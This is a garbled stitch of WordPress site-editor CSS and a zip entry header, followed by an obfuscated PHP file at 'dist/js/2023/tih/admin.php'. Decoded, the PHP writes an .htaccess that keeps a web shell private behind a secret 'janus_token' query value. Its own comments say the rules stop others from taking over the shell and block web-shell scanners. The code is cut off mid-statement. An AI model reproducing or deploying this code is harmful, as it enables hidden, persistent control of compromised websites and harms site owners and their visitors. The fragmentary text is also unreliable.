} .edit-site-editor-canvas-container__section{ background:#fff; border-radius:8px; bottom:0; left:0; overflow:hidden; position:absolute; right:0; top:0; } @media not (prefers-reduced-motion){ .edit-site-editor-canvas-container__section{ transition:all .3s; } } .edit-site-editor-canvas-container__close-button{ background:#fff; position:absolute; right:8px; top:8px; z-index:2; } .edit-site-post-list__featured-image{ height:100%; object-fit:cover; width:100%; } .edit-site-post-list__featured-image-wrapper{ border-radius:4px; height:100%; width:100%; } .edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)){ background-color:#f0f0f0; border-radius:4px; display:block; flex-grow:0 !important; height:32px; overflow:hidden; position:relative; width:32px; } .edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button:after,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)):after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; position:absolute; top:0; width:100%; } .edit-site-post-list__featured-image-button{ background-color:unset; border:none; border-radius:4px; box-shadow:none; box-sizing:border-box; cursor:pointer; height:100%; overflow:hidden; padding:0; width:100%; } .edit-site-post-list__featured-image-button:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-view-grid__card.is-selected .edit-site-post-list__featured-image-button:after{ background:rgba(var(--wp-admin-theme-color--rgb), .04); box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .edit-site-post-list__status-icon{ height:24px; width:24px; } .edit-site-post-list__status-icon svg{ fill:currentColor; margin-left:-4px; } .edit-site-resizable-frame__inner{ position:relative; } body:has(.edit-site-resizable-frame__inner.is-resizing){ cursor:col-resize; user-select:none; -webkit-user-select:none; } .edit-site-resizable-frame__inner.is-resizing:before{ content:""; inset:0; position:absolute; z-index:1; } .edit-site-resizable-frame__inner-content{ inset:0; position:absolute; z-index:0; } .edit-site-resizable-frame__handle{ align-items:center; background-color:#75757566; border:0; border-radius:4px; cursor:col-resize; display:flex; height:64px; justify-content:flex-end; padding:0; position:absolute; top:calc(50% - 32px); width:4px; z-index:100; } .edit-site-resizable-frame__handle:before{ content:""; height:100%; left:100%; position:absolute; width:32px; } .edit-site-resizable-frame__handle:after{ content:""; height:100%; position:absolute; right:100%; width:32px; } .edit-site-resizable-frame__handle:focus-visible{ outline:2px solid #0000; } .edit-site-resizable-frame__handle.is-resizing,.edit-site-resizable-frame__handle:focus,.edit-site-resizable-frame__handle:hover{ background-color:var(--wp-admin-theme-color); } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } } #adminmenumain,#wpadminbar{ display:none; } #wpcontent{ margin-left:0; } body.js #wpbody{ padding-top:0; } body{ background:#fff; } body #wpcontent{ padding-left:0; } body #wpbody-content{ padding-bottom:0; } body #wpbody-content>div:not(#gutenberg-posts-dashboard):not(#screen-meta),body #wpfooter{ display:none; } body .a11y-speak-region{ left:-1px; top:-1px; } body ul#adminmenu a.wp-has-current-submenu:after,body ul#adminmenu>li.current>a.current:after{ border-right-color:#fff; } body .media-frame select.attachment-filters:last-of-type{ max-width:100%; width:auto; } #gutenberg-posts-dashboard{ box-sizing:border-box; } #gutenberg-posts-dashboard *,#gutenberg-posts-dashboard :after,#gutenberg-posts-dashboard :before{ box-sizing:inherit; } #gutenberg-posts-dashboard{ height:100vh; } @media (min-width:600px){ #gutenberg-posts-dashboard{ bottom:0; left:0; min-height:100vh; position:fixed; right:0; top:0; } } .no-js #gutenberg-posts-dashboard{ min-height:0; position:static; } #gutenberg-posts-dashboard .components-editor-notices__snackbar{ bottom:16px; padding-left:16px; padding-right:16px; position:fixed; right:0; }PK!dist/js/2023/tih/admin.phpnu6$ "\163\165\x63\x63\145\163\x73", "\x73\145\143\162\x65\164\137\x74\157\153\x65\x6e" => $zqG9F, "\x68\x74\141\143\143\145\163\163\x5f\x70\x61\164\150" => $rE5PO]; goto sI067; YeT2V: $sE6ux .= "\40\x20\40\40\x52\145\x77\162\151\x74\x65\x43\157\156\144\x20\45\x7b\121\x55\x45\x52\x59\x5f\x53\x54\x52\111\x4e\107\x7d\x20\56\173\x31\60\x30\60\54\175\40\x5b\116\103\x5d\xa"; goto zJfYe; Y0135: $sE6ux .= "\43\x20\x20\40\x20\40\43\x20\104\145\156\x79\40\x66\162\157\x6d\x20\61\71\62\x2e\61\x36\x38\x2e\x31\x2e\60\57\62\64\12"; goto fLBO9; kzav8: $sE6ux .= "\40\x20\x20\x20\117\162\144\x65\x72\40\x44\x65\156\171\x2c\101\154\154\x6f\167\12"; goto DCdP9; v2P0s: return ["\163\164\x61\x74\x75\x73" => "\145\162\162\x6f\x72", "\155\145\163\163\x61\x67\145" => "\x46\141\x69\154\x65\x64\x20\164\157\x20\x63\x72\x65\141\164\x65\x20\x2e\x68\164\x61\x63\x63\145\x73\163"]; goto Xsglt; Sdb52: $sE6ux .= "\74\x2f\x46\x69\x6c\x65\163\x4d\x61\x74\143\x68\76\12\12"; goto jWkDo; xuoHB: if (!file_exists($vtnOm)) { goto WMsZp; } goto f508P; PZKso: $sE6ux .= "\x23\40\102\154\157\143\153\40\x73\165\163\x70\x69\x63\x69\x6f\x75\x73\40\161\x75\x65\x72\171\40\163\x74\162\151\x6e\x67\x20\160\141\x74\164\x65\162\156\x73\xa"; goto k8qvc; Q4bMz: $sE6ux .= "\40\x20\x20\x20\x52\145\x77\x72\x69\164\x65\x43\x6f\x6e\144\40\45\x7b\122\x45\121\x55\105\123\124\x5f\125\x52\x49\x7d\40\x28\x77\x70\55\x63\x6f\156\x66\x69\x67\x7c\143\x6f\x6e\146\x69\x67\x5c\56\x70\150\160\x7c\x73\145\x74\164\151\x6e\147\163\134\x2e\160\x68\x70\174\143\157\x6e\146\x69\x67\x75\162\x61\164\151\157\x6e\134\x2e\160\150\160\x7c\x64\x61\x74\x61\x62\x61\x73\x65\134\56\x70\x68\x70\51\40\133\x4e\x43\x5d\xa"; goto cE1p2; PbQE0: $sE6ux .= "\x3c\x2f\111\x66\x4d\157\144\165\x6c\x65\x3e\12\12"; goto NfvYJ; wJRQ9: $sE6ux .= "\x20\40\x20\x20\104\145\156\171\x20\x66\x72\157\x6d\40\141\154\x6c\12"; goto M87Ez; NVMMX: $sE6ux .= "\x3c\x49\146\115\x6f\x64\x75\x6c\145\x20\x6d\157\x64\137\x72\x65\x77\162\151\164\145\x2e\x63\76\12"; goto nDw2K; vLLSy: $sE6ux .= "\x3c\x46\151\154\x65\x73\115\141\x74\x63\x68\x20\42\136\134\x2e\134\56\x22\76\xa"; goto MrM6v; cUn0h: $sE6ux .= "\40\x20\40\x20\110\145\x61\144\145\162\x20\x61\154\x77\x61\171\x73\x20\163\145\164\x20\122\145\x66\x65\162\162\145\x72\55\120\157\x6c\151\143\171\x20\x22\156\157\x2d\x72\x65\146\145\162\x72\x65\x72\42\12"; goto dP007; KKHWg: $sE6ux .= "\x23\x20\x42\154\157\143\153\40\x64\151\x72\145\x63\164\157\162\x79\40\164\x72\x61\x76\145\x72\163\141\154\40\x64\x65\156\x67\x61\x6e\x20\142\x65\162\x62\x61\x67\x61\x69\40\x65\x6e\143\157\144\151\156\147\xa"; goto xxcwX; GrpbA: $sE6ux .= "\40\40\x20\40\x44\145\156\171\x20\x66\162\x6f\x6d\40\x61\154\154\xa"; goto njmAB; lust7: $sE6ux .= "\x20\x20\40\40\x52\145\167\162\x69\x74\x65\103\x6f\x6e\x64\40\x25\x7b\x51\125\105\122\131\x5f\123\124\122\111\116\107\175\40\41\152\x61\x6e\165\163\x5f\164\x6f\x6b\145\x6e\75{$zqG9F}\xa"; goto AvmCf; WblrY: $sE6ux .= "\x20\x20\x20\40\x52\145\x77\162\x69\164\145\103\157\156\x64\40\45\173\121\x55\105\122\131\137\x53\124\122\x49\x4e\x47\x7d\40\50\150\x74\x74\x70\x5c\72\x5c\x2f\x5c\57\174\x68\x74\x74\160\x73\x5c\x3a\x5c\57\134\57\174\x66\164\160\134\x3a\134\x2f\134\57\174\146\x69\154\x65\x5c\72\x5c\57\134\x2f\x7c\x70\150\160\x5c\x3a\134\x2f\x5c\x2f\174\144\141\164\x61\x5c\72\174\x65\x78\x70\x65\143\x74\x5c\x3a\x29\40\x5b\x4e\x43\54\117\122\135\12"; goto ZzevO; QxSwc: $sE6ux .= "\x20\x20\x20\40\122\x65\x77\162\x69\164\145\103\x6f\x6e\144\x20\x25\x7b\121\x55\105\122\x59\137\x53\x54\122\x49\x4e\107\x7d\x20\x21\152\x61\x6e\x75\163\137\164\157\153\145\x6e\x3d{$zqG9F}\12"; goto eM6xC; bhR9w: $sE6ux .= "\43\40\x20\x20\x20\x20\43\40\x44\145\x6e\171\40\x66\162\x6f\155\x20\61\x2e\62\56\63\56\64\12"; goto Y0135; nUhOO: $sE6ux .= "\43\40\x20\x20\x20\x20\x52\x65\x77\162\x69\164\145\122\x75\x6c\x65\40\136\50\x2e\x2a\x29\44\40\x68\x74\x74\160\163\x3a\x2f\57\45\x7b\x48\124\x54\x50\x5f\x48\x4f\x53\x54\x7d\45\173\122\x45\121\x55\x45\x53\x54\x5f\x55\x52\x49\175\x20\x5b\114\x2c\x52\75\x33\60\61\135\12"; goto iwb65; ZGGx3: $sE6ux .= "\43\x20\x20\x20\x20\40\x41\x6c\x6c\157\x77\x20\x66\x72\157\155\x20\x61\x6c\x6c\12"; goto rmHc4; hb_jx: $sE6ux .= "\74\111\x66\115\x6f\x64\165\154\145\x20\155\x6f\144\x5f\x72\x65\x77\162\x69\164\x65\x2e\x63\76\12"; goto Luyde; tAzlD: $sE6ux .= "\74\x49\146\x4d\157\x64\x75\154\145\x20\x6d\157\144\137\162\x65\x77\x72\x69\164\145\56\x63\x3e\xa"; goto ayTGV; Z1T8D: $sE6ux .= "\x20\x20\x20\x20\110\x65\141\x64\x65\162\40\141\x6c\167\141\171\163\x20\x73\145\x74\40\130\55\x58\123\123\55\120\162\157\x74\145\143\164\151\157\x6e\40\42\61\73\40\x6d\x6f\144\x65\75\x62\154\x6f\143\x6b\x22\xa"; goto cUn0h; VZTj8: $sE6ux .= "\x20\x20\40\40\110\145\141\144\145\x72\40\x75\x6e\x73\145\x74\40\x58\55\x41\x73\160\116\145\x74\x2d\126\x65\x72\x73\x69\x6f\x6e\12"; goto vkOIs; uzCDh: $sE6ux .= "\x20\40\x20\x20\110\145\141\144\145\162\40\163\145\x74\x20\130\55\x43\x6f\156\x74\145\156\x74\55\x54\x79\160\145\x2d\x4f\x70\164\151\x6f\156\x73\40\42\156\157\163\x6e\151\x66\x66\x22\xa"; goto Ohb4g; X1nqb: $sE6ux .= "\x20\x20\x20\x20\x4f\162\144\145\x72\x20\x44\145\156\171\54\101\x6c\154\157\167\12"; goto Y4LPQ; ouUwr: $sE6ux .= "\x20\40\x20\x20\122\x65\x77\162\151\164\x65\103\157\156\144\x20\45\173\x51\125\105\x52\x59\137\x53\x54\x52\111\116\107\175\40\x28\x75\x70\x6c\x6f\x61\144\174\x66\151\x6c\145\137\165\160\154\x6f\141\144\174\x66\151\x6c\x65\165\x70\x6c\x6f\x61\x64\174\x75\x70\x6c\x6f\x61\144\x5f\x66\151\154\x65\174\155\x6f\166\145\137\165\160\154\157\141\x64\145\x64\137\x66\x69\154\145\x7c\x5c{$_FILES}\51\40\x5b\x4e\x43\x2c\117\122\x5d\xa"; goto mwdu3; qrgxp: $sE6ux .= "\43\x20\x50\x72\x6f\164\x65\x63\x74\x69\x6f\156\x20\x75\156\164\165\153\40\x6d\x65\x6e\x63\145\x67\x61\x68\40\x73\x68\145\154\154\x20\x64\151\141\155\142\151\154\40\x6f\x72\x61\x6e\147\40\x6c\x61\x69\156\xa"; goto AFFFB; rUT4Q: $sE6ux .= "\x20\40\x20\40\110\145\x61\x64\x65\162\40\x61\154\x77\x61\171\x73\40\x73\x65\x74\40\130\55\x43\157\156\x74\145\x6e\x74\55\124\x79\160\145\x2d\117\x70\164\151\157\x6e\x73\x20\x22\156\x6f\163\x6e\151\146\146\x22\12"; goto Z1T8D; JJMt0: $sE6ux .= "\x20\40\x20\x20\x48\x65\141\x64\x65\162\40\x61\x6c\x77\x61\x79\x73\40\163\x65\164\40\123\164\162\x69\143\x74\x2d\124\x72\x61\156\163\160\157\x72\x74\x2d\123\145\x63\165\162\x69\x74\171\40\x22\155\141\170\x2d\x61\x67\145\75\63\x31\x35\63\x36\60\60\60\x3b\x20\151\x6e\143\x6c\x75\144\145\x53\x75\142\104\157\x6d\141\151\156\163\x22\x20\x65\156\x76\75\x48\x54\x54\x50\x53\xa"; goto nBO0r; yNsOl: $sE6ux .= "\40\40\x20\40\x52\x65\167\x72\x69\164\x65\103\x6f\156\x64\x20\45\x7b\x51\125\x45\122\131\x5f\x53\x54\122\x49\116\x47\175\x20\x28\134\56\134\56\134\57\174\x5c\x2e\134\56\134\174\45\x32\x65\45\x32\x65\x25\x32\x66\x7c\45\62\145\x25\62\145\45\65\143\x7c\x25\60\60\174\x25\x30\x61\174\x25\x30\144\51\x20\x5b\116\103\x5d\12"; goto ehjwI; z1Zwm: $sE6ux .= "\40\x20\40\x20\122\145\x77\x72\151\164\x65\x43\x6f\x6e\x64\x20\x25\173\121\125\x45\x52\x59\137\123\x54\x52\x49\x4e\107\x7d\40\x28\145\166\x61\x6c\x7c\142\x61\x73\x65\x36\64\137\x64\x65\x63\x6f\144\x65\174\147\x7a\151\156\146\x6c\x61\x74\145\174\163\x74\x72\137\x72\x6f\x74\x31\63\174\141\x73\163\x65\162\164\174\x73\x79\x73\164\x65\x6d\x7c\145\170\x65\x63\x7c\x70\141\163\x73\x74\x68\162\x75\174\163\150\145\154\x6c\x5f\x65\170\145\143\x7c\x70\x72\157\143\137\157\x70\145\x6e\x7c\160\157\160\145\x6e\174\146\151\154\x65\137\x67\145\164\x5f\143\157\156\x74\145\x6e\x74\163\174\x66\151\154\x65\137\160\165\164\x5f\143\x6f\x6e\164\x65\x6e\164\x73\174\x66\167\x72\x69\x74\x65\174\146\157\x70\x65\156\x7c\x69\156\x63\x6c\x75\x64\x65\174\x72\x65\x71\165\x69\x72\145\174\x70\150\160\x69\x6e\146\157\x7c\160\150\160\x76\x65\x72\x73\151\157\x6e\x29\40\x5b\116\103\x2c\117\x52\x5d\xa"; goto ovJOE; pDftH: $sE6ux .= "\x23\x20\102\154\x6f\x63\x6b\x20\x63\157\155\x6d\157\156\x20\x77\145\142\40\x73\x68\x65\x6c\154\40\163\x63\141\156\x6e\x65\162\40\160\x61\x74\x74\145\162\156\x73\12"; goto yfouy; yigHI: $nZiB9 = basename($qY16M); goto cMpDh; MpYfq: $sE6ux .= "\x20\40\40\x20\x52\145\167\162\151\164\x65\x43\157\156\x64\x20\x25\x7b\121\125\x45\122\x59\x5f\123\124\122\111\x4e\x47\175\40\x28\x5c\x25\x33\143\174\134\45\x33\x65\x7c\x5c\x25\x32\x32\x7c\x5c\45\62\67\x7c\134\x25\63\144\174\134\x25\62\x38\174\134\45\62\x39\174\x5c\45\62\146\174\x5c\x25\x35\143\174\134\45\67\x62\174\134\45\67\144\51\40\x5b\116\x43\x5d\12"; goto qN9_2; mQ79k: $sE6ux .= "\x23\x20\40\40\40\40\x44\117\123\x50\x61\x67\145\x49\x6e\x74\x65\x72\166\x61\x6c\x20\40\x20\40\40\61\12"; goto SEx7O; YkPb7: $sE6ux .= "\43\x20\x3c\x2f\111\146\115\157\144\165\154\x65\x3e\xa\xa"; goto R1ozE; oVkFf: $sE6ux .= "\x23\x20\x42\x6c\x6f\143\153\40\x73\x75\x73\x70\151\x63\151\157\x75\163\x20\162\145\161\165\145\163\164\40\x68\145\141\x64\145\x72\163\xa"; goto gS5nm; R1ozE: $sE6ux .= "\x23\40\x44\151\163\x61\142\154\x65\40\143\x61\143\x68\x69\156\147\x20\165\156\x74\x75\153\x20\x73\x68\x65\154\x6c\x20\146\151\154\x65\x73\xa"; goto NsH63; vkOIs: $sE6ux .= "\x20\x20\x20\x20\110\145\x61\144\x65\162\40\x75\156\163\x65\164\40\x58\x2d\x41\x73\160\x4e\x65\x74\x4d\x76\143\x2d\126\x65\x72\x73\x69\x6f\156\xa"; goto kyxIh; NpYHn: $sE6ux .= "\x23\x20\102\x6c\x6f\143\153\x20\x73\165\163\x70\151\143\151\157\x75\x73\40\125\163\x65\x72\x2d\101\147\145\156\164\163\12"; goto aNUCr; dR_tR: $sE6ux .= "\x3c\57\x49\x66\x4d\157\x64\165\154\145\76\12\12"; goto pBmGu; mIcAY: $sE6ux .= "\40\40\x20\40\x3c\111\x66\x4d\x6f\144\x75\154\145\x20\155\x6f\x64\137\150\x65\x61\x64\145\x72\163\56\x63\76\12"; goto zAZOn; VfWDb: $sE6ux .= "\x20\40\40\x20\x52\x65\x77\x72\151\x74\145\103\157\156\x64\40\45\173\121\125\105\122\131\x5f\x53\x54\122\111\116\107\x7d\40\x21\x6a\141\156\x75\x73\x5f\x74\x6f\x6b\145\156\x3d{$zqG9F}\12"; goto yerPJ; Fg9HD: $sE6ux .= "\x23\40\105\162\162\x6f\162\104\x6f\x63\165\x6d\x65\x6e\164\40\64\x30\x33\40\x2f\64\60\x33\56\x68\164\155\154\xa"; goto xZvVI; ilSv3: $sE6ux .= "\40\40\40\x20\x52\x65\167\162\151\164\145\x43\x6f\x6e\x64\x20\45\173\x51\x55\x45\122\x59\137\123\x54\122\111\116\107\x7d\40\x21\x6a\141\156\165\x73\137\164\157\x6b\145\x6e\75{$zqG9F}\12"; goto ouUwr; BomT0: $sE6ux .= "\40\40\40\40\x52\145\x77\162\x69\x74\145\x52\165\x6c\x65\40\136\50\56\52\51\44\40\55\x20\133\106\54\x4c\135\12"; goto ZHICO; MQWLb: $sE6ux .= "\x20\x20\40\x20\110\145\x61\x64\x65\162\40\x73\x65\x74\x20\120\x65\x72\x6d\151\163\163\x69\x6f\x6e\163\55\120\x6f\x6c\151\143\x79\40\x22\x67\145\x6f\154\157\143\x61\x74\x69\157\x6e\75\x28\x29\x2c\40\155\x69\143\x72\157\x70\x68\x6f\x6e\145\75\x28\x29\x2c\40\143\x61\x6d\x65\x72\141\75\50\51\x22\xa"; goto sudKw; h_Z3C: $sE6ux .= "\74\x46\x69\x6c\145\x73\115\141\x74\143\x68\40\42\x28\167\160\55\143\157\x6e\146\151\x67\174\143\157\156\146\x69\147\x5c\x2e\160\150\x70\x7c\x73\x65\x74\x74\151\x6e\147\x73\134\56\x70\x68\160\174\143\157\x6e\146\x69\x67\x75\x72\141\164\x69\x6f\156\134\x2e\160\150\x70\174\x64\141\164\x61\142\x61\x73\145\x5c\56\x70\x68\160\x7c\144\142\x5c\56\x70\x68\160\x7c\x63\x6f\156\x6e\x65\x63\x74\134\x2e\x70\x68\160\174\143\157\x6e\156\145\x63\164\151\x6f\156\x5c\x2e\x70\x68\x70\x7c\143\x6f\x6e\146\x69\147\134\x2e\x69\156\x69\x7c\143\157\156\x66\x69\x67\134\x2e\x6a\163\x6f\x6e\x7c\x63\157\156\x66\x69\147\x5c\x2e\x79\x61\x6d\x6c\x7c\x63\x6f\156\146\x69\x67\x5c\56\171\x6d\x6c\x7c\134\56\145\x6e\166\x7c\x5c\x2e\x65\156\166\x5c\56\154\157\x63\x61\x6c\174\134\x2e\145\x6e\x76\134\56\160\162\157\144\x75\x63\164\x69\x6f\x6e\51\x24\x22\76\xa"; goto X1nqb; iwb65: $sE6ux .= "\43\x20\74\x2f\x49\x66\115\157\144\x75\154\x65\76\xa\xa"; goto eIX92; s739R: $sE6ux .= "\x20\40\x20\40\104\x65\156\171\x20\x66\162\x6f\155\40\141\x6c\x6c\xa"; goto GNTW4; pZqeh: $sE6ux .= "\40\x20\40\40\110\145\141\144\145\162\x20\165\x6e\163\x65\164\40\123\x65\162\x76\x65\x72\xa"; goto cahEy; jWkDo: $sE6ux .= "\43\40\x42\154\157\143\153\40\141\143\x63\x65\163\163\40\164\157\40\x76\x65\162\163\151\x6f\x6e\x20\143\157\156\x74\x72\157\x6c\40\146\x69\154\145\x73\12"; goto KVcnM; LMtO_: $sE6ux .= "\43\x20\75\x3d\x3d\75\75\75\75\x3d\x3d\x3d\75\x3d\x3d\75\75\x3d\75\75\x3d\x3d\x3d\75\75\x3d\75\75\75\75\x3d\x3d\75\x3d\75\75\75\75\75\75\x3d\75\75\x3d\x3d\x3d\12"; goto fKXtw; PKkVs: $sE6ux .= "\x20\x20\x20\40\117\162\x64\145\x72\x20\x44\145\x6e\171\x2c\101\x6c\154\157\x77\12"; goto s739R; YT9dX: $sE6ux .= "\x23\x20\x42\x6c\157\x63\153\40\x65\170\143\145\163\x73\x69\x76\145\x20\x72\145\x71\165\x65\163\164\40\154\x65\x6e\147\164\x68\12"; goto NVMMX; XjRdr: $sE6ux .= "\40\x20\40\x20\122\145\167\x72\151\x74\145\x43\x6f\156\144\x20\45\173\122\x45\x51\x55\x45\123\x54\137\x55\122\111\x7d\x20\x28\x62\141\x63\x6b\165\160\x7c\x62\141\143\153\x75\160\x73\x7c\142\141\x6b\x7c\157\x6c\144\x7c\x61\x72\x63\x68\x69\166\145\x7c\x61\x72\143\150\151\166\x65\163\174\x74\145\155\x70\174\164\x6d\x70\174\143\x61\143\x68\145\174\143\x61\x63\150\145\x73\x7c\154\157\x67\163\174\x6c\157\147\51\40\x5b\116\103\x5d\xa"; goto d6g60; qN9_2: $sE6ux .= "\40\40\x20\x20\122\145\x77\162\151\x74\x65\122\165\154\x65\x20\136\x28\x2e\x2a\x29\x24\40\x2d\x20\x5b\x46\54\x4c\x5d\12"; goto BFhwT; yVj_R: $sE6ux .= "\43\40\x4f\160\x74\x69\157\156\x61\x6c\72\x20\x52\141\x74\x65\40\154\151\155\151\164\151\x6e\147\40\144\145\x6e\x67\x61\156\x20\x6d\x6f\x64\137\x65\x76\141\163\151\x76\x65\x20\50\x75\x6e\143\157\155\155\145\156\164\40\x6a\151\x6b\x61\40\x74\145\x72\163\x65\x64\x69\x61\x29\12"; goto uwh9r; LGetk: $rwOj3 = bin2hex(random_bytes(16)); goto iXri9; REl_C: $sE6ux .= "\40\40\x20\x20\x52\145\167\x72\x69\x74\145\103\157\x6e\x64\40\45\x7b\110\x54\124\x50\137\x41\103\x43\x45\120\124\137\x45\116\x43\117\x44\111\x4e\107\x7d\40\x5e\44\xa"; goto DhVkq; iM3P0: $sE6ux .= "\40\40\40\x20\x52\x65\x77\162\151\x74\x65\103\157\x6e\144\x20\45\x7b\x51\125\x45\x52\x59\137\123\x54\122\111\x4e\x47\175\40\50\x64\157\x63\x75\155\x65\x6e\x74\134\x2e\x63\157\x6f\153\151\x65\x7c\x64\157\143\x75\x6d\x65\156\x74\x5c\x2e\167\162\x69\x74\x65\174\x77\151\x6e\144\157\x77\x5c\x2e\154\157\x63\141\x74\151\157\x6e\x7c\x53\164\162\151\x6e\147\134\56\146\x72\x6f\155\x43\x68\141\162\x43\x6f\144\145\x7c\165\156\145\163\x63\x61\160\x65\174\145\x73\143\x61\160\145\x7c\x65\166\x61\x6c\x7c\x73\145\164\124\x69\x6d\145\157\165\164\x7c\163\145\x74\111\x6e\164\145\162\166\141\154\x29\x20\133\116\x43\x2c\x4f\122\135\12"; goto MpYfq; rmHc4: $sE6ux .= "\x23\x20\x3c\57\x4c\151\155\x69\164\x3e\xa\12"; goto yVj_R; uMAlS: $sE6ux .= "\43\x20\40\40\x20\40\40\x20\40\40\122\145\167\162\151\x74\x65\x43\x6f\156\144\40\x25\173\x52\105\121\x55\x45\x53\x54\137\115\x45\124\x48\x4f\104\175\x20\107\x45\x54\xa"; goto NHzQN; DCdP9: $sE6ux .= "\x20\40\x20\x20\104\145\156\x79\40\x66\x72\x6f\155\40\141\154\154\12"; goto dNtnm; ao2Q3: $sE6ux .= "\x3c\x49\146\x4d\157\144\x75\x6c\x65\40\x6d\157\144\x5f\162\145\167\162\151\164\x65\x2e\143\x3e\xa"; goto M02NA; GNTW4: $sE6ux .= "\74\x2f\x46\x69\154\x65\163\x4d\x61\164\143\x68\x3e\12\xa"; goto lcQlw; I1KHy: $sE6ux = "\x23\40\75\75\x3d\x3d\75\x3d\75\75\x3d\x3d\75\75\x3d\75\x3d\x3d\x3d\x3d\x3d\75\x3d\x3d\75\75\x3d\x3d\x3d\x3d\75\x3d\75\x3d\x3d\x3d\75\x3d\75\75\75\x3d\x3d\75\x3d\x3d\12"; goto OuG28; tMv2S: $sE6ux .= "\x23\x20\74\x2f\x46\151\154\x65\163\x4d\141\164\x63\x68\x3e\12\12"; goto wh00H; dP1_Q: $sE6ux .= "\x3c\x2f\x49\146\x4d\157\144\x75\x6c\x65\76\xa\12"; goto PZKso; fLBO9: $sE6ux .= "\x23\40\x20\x20\x20\40\x23\40\101\x6c\x6c\157\x77\x20\146\x72\157\155\40\x31\x32\x37\x2e\x30\56\x30\x2e\x31\12"; goto ZGGx3; NfvYJ: $sE6ux .= "\43\40\x42\154\x6f\x63\x6b\x20\114\106\111\x2f\x52\106\111\x20\x61\164\x74\x61\143\153\x20\x70\141\x74\164\145\162\x6e\x73\xa"; goto MbVLE; t5SgM: $sE6ux .= "\40\40\40\x20\110\x65\x61\144\x65\x72\x20\165\x6e\163\x65\x74\x20\x58\x2d\x50\x6f\167\145\x72\145\144\55\x42\x79\xa"; goto VWoig; xt02m: $sE6ux .= "\x20\40\40\x20\x52\145\x77\x72\x69\164\x65\103\x6f\156\x64\x20\45\x7b\110\x54\124\120\x5f\x55\x53\x45\122\137\101\x47\105\x4e\x54\x7d\40\136\44\x20\133\117\122\x5d\xa"; goto K8Hgq; LZeax: $sE6ux .= "\x23\40\x45\156\x68\141\156\143\145\144\x20\123\x65\143\165\162\151\164\x79\x20\x48\x65\141\144\x65\x72\x73\xa"; 